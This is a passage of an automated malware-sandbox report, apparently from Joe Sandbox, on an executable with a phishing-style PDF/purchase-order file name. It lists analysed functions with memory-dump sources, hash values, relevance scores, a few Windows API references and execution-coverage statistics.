Opcode ID: 64fd5c95828efdc1cc6823f65113aad92bebb9a50d600e1cf58b88d0fdb9a7ea
Instruction ID: 3e30abcf874fe706eaba8377e6fee1dcc39863facbc7650dfe09f595a4010009
Opcode Fuzzy Hash: 64fd5c95828efdc1cc6823f65113aad92bebb9a50d600e1cf58b88d0fdb9a7ea
Instruction Fuzzy Hash: 291110B59003499FDB20DF9AC484BDEBFF4EB48320F20845DE458A7610C374A944CFA1

Function 0321E298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0321E2FE

Memory Dump Source

Source File: 00000001.00000002.1460113401.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3210000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 209a3b0c5c8b756184164ce317caf532835ee6d406b459bdeea09f1b1fa2d410
Instruction ID: d59336a96ed20076c5c9991e9a83b3dfe78ecca06e96544b85e80e27cd3cd028
Opcode Fuzzy Hash: 209a3b0c5c8b756184164ce317caf532835ee6d406b459bdeea09f1b1fa2d410
Instruction Fuzzy Hash: DA1110B6C003498FCB20DF9AC844BDEFBF4AF88320F15841AD819A7200C379A545CFA1

Function 08CDB270 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 08CDC04F

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e3e83c991bbe451378b178635e680e9b8a0fe9aa9afc0117cb09334d16ff2ceb
Instruction ID: 619e183f36e4a6e8e672227ae5f854641e8a5624a05840450bf5654be98d8d33
Opcode Fuzzy Hash: e3e83c991bbe451378b178635e680e9b8a0fe9aa9afc0117cb09334d16ff2ceb
Instruction Fuzzy Hash: B11128B18007498FDB20DF9AC4457DEBBF4EB88320F108419D558A3341D778A944CFA5

Function 08CDBFE9 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 08CDC04F

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a790c518f6a76b7d1e6a183635510e02d258d6702f933f0cdff2c3247d6393e8
Instruction ID: abd3ccd0d4e6a5d5e73208ba4d9ad57215ece92daf7f77a0e448383b4430e06c
Opcode Fuzzy Hash: a790c518f6a76b7d1e6a183635510e02d258d6702f933f0cdff2c3247d6393e8
Instruction Fuzzy Hash: B41133B18003498FDB20DF9AC448BDEBBF4EF48320F20846AD558A7351D778A984CFA5

Function 0159D080 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1459300731.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_159d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1009d2c79b759ebeb61769f21d76b9cb1cce7b31c3e4f973e79709276c734fa3
Instruction ID: def749f671b982d2378080b8f767045e39bdede8efac073a9eee5a5c362a05db
Opcode Fuzzy Hash: 1009d2c79b759ebeb61769f21d76b9cb1cce7b31c3e4f973e79709276c734fa3
Instruction Fuzzy Hash: 94318D750093808FCB078F64D894615BFB1FF46324F1985EAC9458F2A7C33A984ADB62

Function 0158D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1459251178.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_158d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87a01a262665a7df34966a054582633154a20e829b975ae6b20a78f7982b4b0
Instruction ID: c7dbe61844f7e03a57344f9e8fbb8f5b48eece4571946a59511b2726eee31556
Opcode Fuzzy Hash: c87a01a262665a7df34966a054582633154a20e829b975ae6b20a78f7982b4b0
Instruction Fuzzy Hash: A721F471504240DFDB05EF54D9C0B2ABFB5FB84618F20C56AD8051E296C336D456CAB2

Function 0159D0DC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1459300731.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_159d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d02d5b0c1dbf433f143641293502145010144187990e5a5c4e98fbd8389a165
Instruction ID: f07173a1632deadfe6a596046d8afcc01157f4673b22b89dd87f89fc39aac075
Opcode Fuzzy Hash: 0d02d5b0c1dbf433f143641293502145010144187990e5a5c4e98fbd8389a165
Instruction Fuzzy Hash: 7D2122B6604304DFDF01DF54D884B16BBB5FB84214F20C96DD9090F396C33AD846DA62

Function 0159D294 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1459300731.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_159d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248c8a56073140d587a9aa98390c0ac39d32dbc9f3d72851a4ee905fe5506a36
Instruction ID: 8394e1c4e66085ab1849382f52cc9dd10975f0463db8ebbcfdca87d3b1b5bf92
Opcode Fuzzy Hash: 248c8a56073140d587a9aa98390c0ac39d32dbc9f3d72851a4ee905fe5506a36
Instruction Fuzzy Hash: 0921D075604204DFDF05DF94D984B2ABBB5FB84625F24C9ADD8494F282C33AD846CA62

Function 0158D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1459251178.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_158d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: 56b8c85c4b93aa0187e71e77e52da0ff95acf8c09383be287a5b22aa04abddad
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: D0119D76504280DFCB16DF54D5C4B1ABFB2FB84224F2486AAD8490B696C33AD456CBA1

Function 0159D28F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1459300731.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_159d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: f8201c95c9b2449679e9b74c349066903efb2f0521fa5831294a3fc7ae4e554e
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 5B11BB79508280CFCB02CF58D5C0B19BFB2FB84225F24C6A9D8494F693C33AD40ACB62

Function 0158D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1459251178.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_158d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82b925714eae4860e846c51ec13c2116c1b243fd61f1fd0353e66cb13a51c86
Instruction ID: 77611dada348d3c037bdf12eee8c02940499a16d834d721fd235f69fcd4d5d64
Opcode Fuzzy Hash: a82b925714eae4860e846c51ec13c2116c1b243fd61f1fd0353e66cb13a51c86
Instruction Fuzzy Hash: FC01F7711043849AF7107EA5CC84B6ABFE8FF45665F14C91AEE089E2C2C6399400CB72

Function 0158D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1459251178.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_158d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513f6aec3da02e111138be96635ca59a5d07b2990181b451d1b5c04a827e1745
Instruction ID: 45facfaae5bd49ea0c264ad9a74cee9e4337570b6821611b04c1042fed0b6568
Opcode Fuzzy Hash: 513f6aec3da02e111138be96635ca59a5d07b2990181b451d1b5c04a827e1745
Instruction Fuzzy Hash: FCF062715043849EE710AE1ACC84B66FFE8EB45674F18C55AED485E2C7C2799844CBB1

Non-executed Functions

Function 091A6180 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c1d46a5fb74838fdcb425583e7a1b24a18ce0a6588d2381be8f9881189f196
Instruction ID: 19244797921de01a6441e22d6df3d0a34a997074a17ba4681f716a2880e16b9e
Opcode Fuzzy Hash: c8c1d46a5fb74838fdcb425583e7a1b24a18ce0a6588d2381be8f9881189f196
Instruction Fuzzy Hash: CBE10674E002198FDB14DFA8D584AAEFBB2FF89345F248169E418AB355D731AD42CF60

Function 091A3838 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8250d16ef0f8854abf31a3f6925d0f9ec7563f2b33ed2dbac357e33ff68b4102
Instruction ID: f4e3cd470d39db0a30208ba635849c866b0e59ab429948ec0acdd641d06a9473
Opcode Fuzzy Hash: 8250d16ef0f8854abf31a3f6925d0f9ec7563f2b33ed2dbac357e33ff68b4102
Instruction Fuzzy Hash: 25E11874E002198FDB14DFA9D580AAEFBB2FF89305F248169E418AB355D735AD42CF60

Function 091A40A8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed13fc3ee9303414e46bd551f6a8ae8b6221fc7e432e0cc162d02dce7339a8a
Instruction ID: 7fe0885004aade63f4ce638b948cd129f2ffb9ab66499b3041a92dd859ffe31a
Opcode Fuzzy Hash: 0ed13fc3ee9303414e46bd551f6a8ae8b6221fc7e432e0cc162d02dce7339a8a
Instruction Fuzzy Hash: F0E1F774E002198FDB14DFA9D580AAEFBB2FF89305F248169E414AB355D771AD42CFA0

Function 091A3C70 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c473297467ecf7ceddc739a23b905364a95f371e76b756608725f5f1b28f1c
Instruction ID: 423fa6b88064d85ca2ef3ea0a1589fb8d2e51bb828c263f8612c2d9fd67e5159
Opcode Fuzzy Hash: 71c473297467ecf7ceddc739a23b905364a95f371e76b756608725f5f1b28f1c
Instruction Fuzzy Hash: 30E1F774E002198FDB14DFA9D680AAEFBB2FF89305F248169E414AB355D731AD42CF61

Function 091A44E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f8db54f592ea7f4e9c9dca4689170bdfce9af6ba0ba2d1568a05f31a5f788e
Instruction ID: 18639b3e7b1d0eafd2df47db7267543bed251ba9c48f85bdbad3c0ded2f1aabc
Opcode Fuzzy Hash: b0f8db54f592ea7f4e9c9dca4689170bdfce9af6ba0ba2d1568a05f31a5f788e
Instruction Fuzzy Hash: 97E11574E002598FDB14DFA8D580AAEFBB2FF89345F248169E418AB355D731AD42CF60

Function 08CD9B40 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 714d9dbc02e45074cb3e743d4610a39e5cedf99cd66cef350df44338a1555997
Instruction ID: 628b1d0405b0062c2682ec07a84bbc937e27b7903a1d3c165c3f64472a99374a
Opcode Fuzzy Hash: 714d9dbc02e45074cb3e743d4610a39e5cedf99cd66cef350df44338a1555997
Instruction Fuzzy Hash: A3E1F674E012598FDB14DFA9C580AAEFBF2FF89305F248169D518AB356C730A946CF60

Function 08CDACE8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a869b9d06727915c332b3f2eff6928be0e2b5150a51c5eba9c7834862209e54
Instruction ID: c0d15e89acb6bb8cf37c7683f3b98806e314221f95c98223611ac0d79886fa40
Opcode Fuzzy Hash: 6a869b9d06727915c332b3f2eff6928be0e2b5150a51c5eba9c7834862209e54
Instruction Fuzzy Hash: 53E1F574E012598FDB14DFA9C580AAEFBB2FF89305F248169D514AB355DB30AD42CFA0

Function 08CD9F78 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d471d2cf58dbde407c624c79f28d82fa123757e63076dd7ce7764347afe90e83
Instruction ID: da7ae1d5e34b195647f2077fb7a6df03c86a3d7bdafb70ded723042c9c1cf778
Opcode Fuzzy Hash: d471d2cf58dbde407c624c79f28d82fa123757e63076dd7ce7764347afe90e83
Instruction Fuzzy Hash: A2E10674E01259CFDB14DFA9C580AAEFBB2FF89305F248169D518AB355C730A942CF60

Function 08CDA438 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 864889c9a0936b6c4c3e03c920141338bc93d75c9d892f93678b9911b1557ee0
Instruction ID: 5ef604a1a872b69793d80e1cc397c3dd2a89d6f2e263fb5d349aae51f7975419
Opcode Fuzzy Hash: 864889c9a0936b6c4c3e03c920141338bc93d75c9d892f93678b9911b1557ee0
Instruction Fuzzy Hash: 6AE1F674E01259CFDB14DFA9C580AAEBBB2FF89305F24C169D914AB355DB30A942CF60

Function 08CDD170 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 336a0f21f206fc40633edbbd38685d58dca806f93f32592c2c1b484084220270
Instruction ID: 1fbacaba4594846f6d0685f54d579e1308d9bbfe45c8f2845a18c49465c3fede
Opcode Fuzzy Hash: 336a0f21f206fc40633edbbd38685d58dca806f93f32592c2c1b484084220270
Instruction Fuzzy Hash: A2718F75E012188FDB04DFAAC984A9EFBF2BF89311F14C16AD519AB315D734A942CF50

Function 091A40A3 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a79ac9ab5ed420b8e4059a8bd09a280b0221a5e65513f0d49fd32e24ab76a3fb
Instruction ID: 9a4130a9871b7cd680202a1e2d2f24ebbaf6a6a7b3d12375a74396f455756681
Opcode Fuzzy Hash: a79ac9ab5ed420b8e4059a8bd09a280b0221a5e65513f0d49fd32e24ab76a3fb
Instruction Fuzzy Hash: 5C51D574E002198FDB14CFA9D5809AEBBF2FF89305F248169D418AB356D771AD42CFA1

Function 091A44DB Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d680ec1f7e008e3f915ded7a6ddad68f7f5006e231c94c09806c47f68143abef
Instruction ID: ee3d38108ae968adca3fa5639e4cb500e65dbbc86416f1b953eb4f26a8651fe3
Opcode Fuzzy Hash: d680ec1f7e008e3f915ded7a6ddad68f7f5006e231c94c09806c47f68143abef
Instruction Fuzzy Hash: 46510474E002198FDB14DFA9D9809AEBBB2FF89344F248269D418AB256D7319D42CF60

Function 08CDD16B Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b95ed88f4e917eb3cf4c92c8cecf723d85f2b90b465be351e194e742dac4b0ed
Instruction ID: 1fdc4257f6fe8defda63313a952ff18f87aa50fcb9bbbe52cce9a41af565c751
Opcode Fuzzy Hash: b95ed88f4e917eb3cf4c92c8cecf723d85f2b90b465be351e194e742dac4b0ed
Instruction Fuzzy Hash: 79516E75E006198FDB48DFAAC98469EFBF2BF88301F14C16AE519AB314DB349946CF50

Function 091AA050 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 528d926f751ae6ee31a7cfc6ed61af396b5a682733996f4cb0f3b139ae4cace8
Instruction ID: 7799c3b54e3d6062062c77abeba801fb8cd7b2c0821955d40ef538d0fe3c3dd9
Opcode Fuzzy Hash: 528d926f751ae6ee31a7cfc6ed61af396b5a682733996f4cb0f3b139ae4cace8
Instruction Fuzzy Hash: 23B0922EF8B11595890809D470000F8F33E8B8B2BBF423066C64EB300153129D268148

Analysis Process: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exePID: 2788, Parent PID: 1036COMMON

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	9.1%
Total number of Nodes:	22
Total number of Limit Nodes:	2

Executed Functions

Function 05C69548 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3896059789.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5c60000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0396ec27b823e785ad8fa2e500d454e3a5b4b15b14a3019f63cf1bcde30f66c5
Instruction ID: 8a7be1b7110bba89457719cdab4f105655ccbe964c11fe6deb7b568b603d38ca
Opcode Fuzzy Hash: 0396ec27b823e785ad8fa2e500d454e3a5b4b15b14a3019f63cf1bcde30f66c5
Instruction Fuzzy Hash: BDF1D574E00218CFDB24DFA9C984B9DBBB2FF88304F5485A9D448AB355DB719A86CF50

Function 01529DE0 Relevance: 1.1, Instructions: 1148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdf9ce1505654ae44de609e504d0f5aacf2d311b98292faa11a97463487d2c7a
Instruction ID: 3d1290f1ae90e821018e77ac2da79ed5640f1e115495d0e28b71ef2b4eb22ba3
Opcode Fuzzy Hash: cdf9ce1505654ae44de609e504d0f5aacf2d311b98292faa11a97463487d2c7a
Instruction Fuzzy Hash: 46A28D36A002258FDB16CF68C984AAEBBF2BF8A300F158559E405DF7A6D774E845CB50

Function 015269A0 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7a37419a7a3a811b705dd20cd9c1030336028a3c39cbb3b8ea28082497b656
Instruction ID: 06d5c89d12a21c4e5d82e3bd1207cfb0335dd1c720940a456cc5db938b78b257
Opcode Fuzzy Hash: 1b7a37419a7a3a811b705dd20cd9c1030336028a3c39cbb3b8ea28082497b656
Instruction Fuzzy Hash: 01129B75A002198FDB14CF69C854BAEBBF2FF89300F208569E816AB395DF349D45CB90

Function 01526FC8 Relevance: .5, Instructions: 512
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: defdcd2e4305e586cca073896709139a07d1dc8a579e083c898649fe021fa5ea
Instruction ID: 44d89f34589e2b178088e57b97d643a924803b36d71233d94ce9a9dda3cbab24
Opcode Fuzzy Hash: defdcd2e4305e586cca073896709139a07d1dc8a579e083c898649fe021fa5ea
Instruction Fuzzy Hash: C0224B32A00225DFDB15CF69C884AAEBBF2FF9E304F158469E915AB2A1D734DC41CB50

Function 01523E09 Relevance: .4, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c87311aea91d98e5881d4df46947fa04357529ff5238190f41c2412b7380e5
Instruction ID: 5041d69c952b2484c98e6d7c01cebfe0820dfe3711ba462b895d76df04f20851
Opcode Fuzzy Hash: a7c87311aea91d98e5881d4df46947fa04357529ff5238190f41c2412b7380e5
Instruction Fuzzy Hash: 44F17875F00219DFDB18DFB5D8409AEBBF2FF89710B14896DE406AB294DB399C028B51

Function 015229EC Relevance: .3, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56f8788dcd8df93d222857c9a8889fabaad033c46a8e22b646223a7e14b1ab9
Instruction ID: dc3a2f38dddd831b43f11d2b5056a9c938472f77dbc3cf4d782a47dc319c5efb
Opcode Fuzzy Hash: e56f8788dcd8df93d222857c9a8889fabaad033c46a8e22b646223a7e14b1ab9
Instruction Fuzzy Hash: 1CB13776D003298FCBA18F64C8446AFBBB5FFC6320F11866ED0456B681D7789D45CB92

Function 0152C146 Relevance: .2, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bcf789b7f2fb0b4fb00cd2ed3d6af0b4472386d3610cfc56db4c1a43d7fc74b
Instruction ID: 2aadc0e412653aed1fbdd798ba4f28ecfb41f5501da0c7cb9bd547f1f9589c99
Opcode Fuzzy Hash: 2bcf789b7f2fb0b4fb00cd2ed3d6af0b4472386d3610cfc56db4c1a43d7fc74b
Instruction Fuzzy Hash: 95A1E775E00218DFDB54CFAAD884A9DBBF2BF89310F14846AE409AB365DB319941CF51

Function 01523B95 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4259434591e9a2ba0c16996ba6626ae2610950c34d2ca868079bd74f7eefee26
Instruction ID: c956a741c240f0cf98b52a9cd03de67f0e68ccec768945291782de354ddd326d
Opcode Fuzzy Hash: 4259434591e9a2ba0c16996ba6626ae2610950c34d2ca868079bd74f7eefee26
Instruction Fuzzy Hash: C85129337403219BDB998A658C806AF7BF6BBC6660B49847ED402DF792D77CCC068761

Function 01525362 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852ccf755a4bbaad36133f643861a611604565a1c7247911c4d3c8e24209d671
Instruction ID: d6f4df24952082378a5810fae323fb6d823b4734d2f1bc6d095e2c82ccc1bef7
